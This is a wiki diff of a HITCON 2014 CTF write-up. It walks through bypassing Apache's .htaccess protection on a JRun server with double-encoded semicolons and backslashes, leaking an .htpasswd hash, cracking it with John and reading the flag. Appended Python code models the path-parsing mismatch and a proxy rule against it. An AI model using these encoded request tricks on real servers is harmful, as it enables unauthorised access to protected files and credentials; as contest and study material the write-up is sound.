Diff for "CTF/Writeup/HITCON2014/LEENODE"

MMA
Differences between revisions 1 and 2
Revision 1 as of 2014-08-19 00:48:54
Size: 1581
Editor: ytoku
Comment:
Revision 2 as of 2014-08-19 00:55:29
Size: 1586
Editor: ytoku
Comment:
Deletions are marked like this. Additions are marked like this.
Line 3: Line 3:
 1. The server is Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp is redirected to JRun server.
 1. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp was redirected to JRun server.
Line 6: Line 6:
 1. I found the vulnerability information of JRun
 1. I found a vulnerability information of JRun
Line 8: Line 8:
 1. [[http://203.66.57.98/a;.jsp]] is 500 Internal Server Error. It is interesting. by Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] is /a and 404 Error by JRun. It is very interesting.
 1. Can I get .htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: Answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognizes backslash as directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] is handled as /a by JRun.
 1. [[http://203.66.57.98/a;.jsp]] was 500 Internal Server Error. It is interesting. by Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] was /a and 404 Error by JRun. It is very interesting.
 1. Can I get /.htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: Answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognized backslash as directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] is handled as /a by JRun.
Line 21: Line 21:
 1. Use John. the password is ktw2z. {{{
 1. Use John. The password was ktw2z. {{{
Line 26: Line 26:
 1. There is the flag on [[http://203.66.57.98/admin/thefl4g.txt]]. {{{
 1. There was the flag on [[http://203.66.57.98/admin/thefl4g.txt]]. {{{

LEENODE

  1. Perhaps what we need to do is to access /admin/.
  2. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
  3. *.jsp was redirected to the JRun server.
  4. I found vulnerability information about JRun.
  5. http://203.66.57.98/a;.jsp was a 500 Internal Server Error. It is interesting. By Apache?

  6. I tried to escape the URL for Apache; http://203.66.57.98/a%253b.jsp was /a and a 404 Error by JRun. It is very interesting.

  7. Can I get /.htaccess or /admin/.htaccess? http://203.66.57.98/.htaccess%253b.jsp, http://203.66.57.98/admin/.htaccess%253b.jsp: The answer is no. These are blocked by Apache. We need more tricks.

  8. Then, I found that JRun recognized a backslash as a directory separator (for Windows?). http://203.66.57.98/.%5Ca%253b.jsp is handled as /a by JRun.

  9. Finally, I got the /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp and /admin/.htaccess via http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp.

    AuthName "Restricted Area" 
    AuthType Basic 
    AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd 
    AuthGroupFile /dev/null 
    require valid-user
    hitc0n_1een0de:nlGc3XNhkrL1o
  10. Use John. The password was ktw2z.

    % john htpasswd
    ktw2z            (hitc0n_1een0de)
    guesses: 1  time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014)  c/s: 5319K  trying: ktkcK - kk4iT
  11. There was the flag on http://203.66.57.98/admin/thefl4g.txt.

    The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}
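The writeup turns on two components reading the same request path differently: Apache checks its .htaccess rules against a once-decoded path with literal `;` and `\`, while JRun decodes again, treats `\` as `/` and drops the `;...` path parameter. The following is an added example (not code from the writeup) that models both views and flags a request whose backend interpretation lands somewhere the front end never authorized. The decoding rules, the `/admin/` policy and the sample paths are assumptions modelled on the behaviour reported above, not a description of how either product actually parses URLs.

```python
"""Compare a front-end proxy's view of a request path with a lenient backend's.

Added example, not code from the writeup. The decoding rules are assumptions
modelled on the behaviour the writeup reports for Apache in front of JRun:
the backend percent-decodes more than once, treats '\\' as '/', and drops
';...' path parameters. Input is the request path without scheme, host or query.
"""
from dataclasses import dataclass
from urllib.parse import unquote
import posixpath

# Hypothetical policy for this demo: /admin/ is guarded by an .htaccess on the
# front end, and these dotfiles must never be served by any component.
PROTECTED_PREFIXES = ("/admin/",)
SENSITIVE_BASENAMES = frozenset({".htaccess", ".htpasswd"})


def decode_until_stable(path, max_rounds=3):
    """Percent-decode repeatedly; return (decoded, number of rounds that changed it)."""
    changed = 0
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path, changed = decoded, changed + 1
    return path, changed


def frontend_view(raw_path):
    """Assumed proxy view: a single decode, '/' as the only separator, ';' literal.
    A prefix or <Files> rule on the proxy matches against this string."""
    return posixpath.normpath(unquote(raw_path))


def backend_view(raw_path):
    """Assumed lenient backend view. Returns (canonical path, decode rounds, saw backslash)."""
    decoded, rounds = decode_until_stable(raw_path)
    slashed = decoded.replace("\\", "/")
    # ';' starts a path parameter in servlet-style URL handling; drop it per segment.
    stripped = "/".join(seg.split(";", 1)[0] for seg in slashed.split("/"))
    canonical = posixpath.normpath(stripped)
    if not canonical.startswith("/"):
        canonical = "/" + canonical
    return canonical, rounds, "\\" in decoded


@dataclass
class Assessment:
    raw_path: str
    frontend_path: str
    backend_path: str
    findings: list


def assess(raw_path):
    """Flag requests whose two interpretations disagree or that reach guarded paths."""
    fe = frontend_view(raw_path)
    be, rounds, backslash = backend_view(raw_path)
    findings = []
    if rounds >= 2:
        findings.append("double_encoding")
    if backslash:
        findings.append("backslash_separator")
    if fe != be:
        findings.append("view_mismatch")
    if be.startswith(PROTECTED_PREFIXES) and not fe.startswith(PROTECTED_PREFIXES):
        findings.append("protected_prefix_only_in_backend_view")
    if posixpath.basename(be) in SENSITIVE_BASENAMES:
        findings.append("sensitive_file")
    return Assessment(raw_path, fe, be, findings)


def proxy_decision(raw_path):
    """Mitigation: decide on the backend-canonical path and refuse ambiguous requests."""
    result = assess(raw_path)
    if "sensitive_file" in result.findings or "view_mismatch" in result.findings:
        return "deny"
    if result.backend_path.startswith(PROTECTED_PREFIXES):
        return "require_auth"
    return "allow"


if __name__ == "__main__":
    # Constructed sample paths, including the encodings the writeup discusses.
    for p in ("/index.jsp", "/admin/thefl4g.txt", "/a%253b.jsp", "/.%5Cadmin%5C.htaccess%253b.jsp"):
        r = assess(p)
        print(f"{p:40} fe={r.frontend_path!r:32} be={r.backend_path!r:20} {proxy_decision(p)} {r.findings}")
```

The design choice worth noting is in `proxy_decision`: the access rule is evaluated on the backend's canonical path, and any request where the two views disagree is refused outright rather than forwarded, so a guard in front cannot be talked past by feeding the component behind it a path it decodes differently.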

CTF/Writeup/HITCON2014/LEENODE (last modified 2014-08-19 03:06:33 by ytoku)